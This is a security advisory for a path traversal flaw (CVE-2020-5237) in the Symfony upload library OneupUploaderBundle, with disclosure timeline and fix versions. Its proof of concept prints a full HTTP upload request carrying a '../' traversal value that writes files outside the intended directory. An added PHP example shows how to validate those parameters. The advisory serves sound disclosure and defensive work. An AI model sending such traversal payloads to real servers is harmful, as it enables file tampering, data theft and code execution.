Advisory ID: SYSS-2020-003
Product: OneupUploaderBundle
Manufacturer: 1up GmbH
Affected Version(s): before 1.9.3 and 2.1.5
Tested Version(s): 1.4.0 and 2.1.4
Vulnerability Type: Relative Path Traversal (CWE-23)
Risk Level: High
Solution Status: Fixed
Manufacturer Notification: 2020-01-30
Solution Date: 2020-02-04
Public Disclosure: 2020-02-04
CVE Reference: CVE-2020-5237
Author of Advisory: Thibaud Kehler, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

OneupUploaderBundle is a library that adds support to the PHP web
application framework Symfony for handling file uploads from a variety of
web frontends.

The manufacturer describes the product as follows (see [1]):

"This Symfony bundle provides a server implementation for handling single
and multiple file uploads using either FineUploader, jQuery File Uploader,
YUI3 Uploader, Uploadify, FancyUpload, MooUpload, Plupload or Dropzone.
Features include chunked uploads, orphanages, Gaufrette and Flysystem
support."

Due to missing validation of user input, the provided web service is
vulnerable to path traversal attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The vulnerability was identified in the web service for chunked file
uploads. While the names of the POST parameters vary with the frontend in
use, their values are always used in the same way to build the path where
the chunks are stored and assembled temporarily.

Because these parameters are not validated properly, OneupUploaderBundle
is susceptible to a path traversal vulnerability that can be exploited to
upload files to arbitrary directories on the filesystem. The assembly
process can further be misused, with some restrictions, to delete files
and to copy files to other locations.
The vulnerability can be exploited by any user who has legitimate access
to the upload functionality and can lead to arbitrary code execution,
denial of service and disclosure of confidential information.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

When the web service is configured to accept files from the JavaScript
frontend "FineUploader", it processes the parameters "qquuid",
"qqpartindex" and "qqfilename" from the HTTP request. Similar approaches
worked with the variants for the frontends "Blueimp" (jQuery), "Dropzone",
"MooUpload" and "Plupload".

The default configuration saves the chunks in the following directory
relative to the application directory:

var/cache/{servername}/uploader/chunks/{qquuid}/{qqpartindex}_{qqfilename}

Since the parameters are not sanitized, it is possible to upload files
outside of that directory structure, e.g. with the following request:

POST /_uploader/gallery/upload HTTP/1.1
Host: webapp.tld
Content-Type: multipart/form-data; boundary=--12345
Content-Length: 455

----12345
Content-Disposition: form-data; name="qqpartindex"

1
----12345
Content-Disposition: form-data; name="qqtotalparts"

3
----12345
Content-Disposition: form-data; name="qqfilename"

poc.txt
----12345
Content-Disposition: form-data; name="qquuid"

../../../../../poc/
----12345
Content-Disposition: form-data; name="qqfile"; filename="poc.txt"
Content-Type: application/octet-stream

This file should not be here!
----12345--

If the process of the web server has sufficient permissions, the file is
created in a new directory "poc/1_poc.txt" in the application directory.
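The following is an added example and not the bundle's own code: it builds the chunk path in the layout described above ({base}/{qquuid}/{qqpartindex}_{qqfilename}) with the input validation whose absence the advisory describes, and rejects the PoC's "qquuid" value. The function name and the use of the system temporary directory as chunk base are assumptions for the demonstration.

```php
<?php
// Added example, not the bundle's own code: build the chunk path the advisory
// describes ({base}/{qquuid}/{qqpartindex}_{qqfilename}) with the validation
// that was missing. Function name and base directory are assumptions.
declare(strict_types=1);

function buildChunkPath(string $chunkBaseDir, string $uuid, string $partIndex, string $filename): string
{
    // qquuid: strict 8-4-4-4-12 hex UUID, so "../" or "/" can never appear.
    if (preg_match('/^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$/i', $uuid) !== 1) {
        throw new InvalidArgumentException('qquuid is not a UUID');
    }
    // qqpartindex: digits only (no sign, dot or separator), then cast.
    if (preg_match('/^\d{1,9}$/', $partIndex) !== 1) {
        throw new InvalidArgumentException('qqpartindex is not a non-negative integer');
    }
    // qqfilename: reject NUL, keep only the last segment of either separator style,
    // and refuse the empty / dot-only names basename() can still return.
    if (strpos($filename, "\0") !== false) {
        throw new InvalidArgumentException('qqfilename contains a NUL byte');
    }
    $name = basename(str_replace('\\', '/', $filename));
    if ($name === '' || $name === '.' || $name === '..') {
        throw new InvalidArgumentException('qqfilename is not a plain file name');
    }

    $base = realpath($chunkBaseDir);
    if ($base === false) {
        throw new RuntimeException('chunk base directory does not exist');
    }
    $path = $base . DIRECTORY_SEPARATOR . $uuid . DIRECTORY_SEPARATOR . (int) $partIndex . '_' . $name;

    // Defence in depth: the assembled path must still lie below the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('chunk path escapes the chunk directory');
    }
    return $path;
}

// Constructed inputs: the PoC's qquuid value is rejected; a valid one yields a
// path inside the chunk directory.
$base = sys_get_temp_dir();
try {
    buildChunkPath($base, '../../../../../poc/', '1', 'poc.txt');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
echo buildChunkPath($base, '3f2a1c6e-9b1d-4e7a-8c3f-1d2e3f4a5b6c', '1', 'poc.txt'), "\n";
```

Note that basename() alone would not have helped here: applied to the PoC value "../../../../../poc/" it returns "poc", which is why the UUID is validated against a strict pattern before it reaches the path.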
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to version 1.9.3 or 2.1.5.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2020-01-27: Vulnerability discovered
2020-01-30: Vulnerability reported to manufacturer
2020-02-04: Patch released by manufacturer
2020-02-04: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] GitHub repository for OneupUploaderBundle
    https://github.com/1up-lab/OneupUploaderBundle
[2] Security advisory on GitHub
    https://github.com/1up-lab/OneupUploaderBundle/security/advisories/GHSA-x8wj-6m73-gfqp
[3] Manufacturer website
    https://1up.io/
[4] SySS Security Advisory SYSS-2020-003
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thibaud Kehler of SySS GmbH.

E-Mail: thibaud.kehler@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud_Kehler.asc
Key ID: 0xB6457D7A
Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en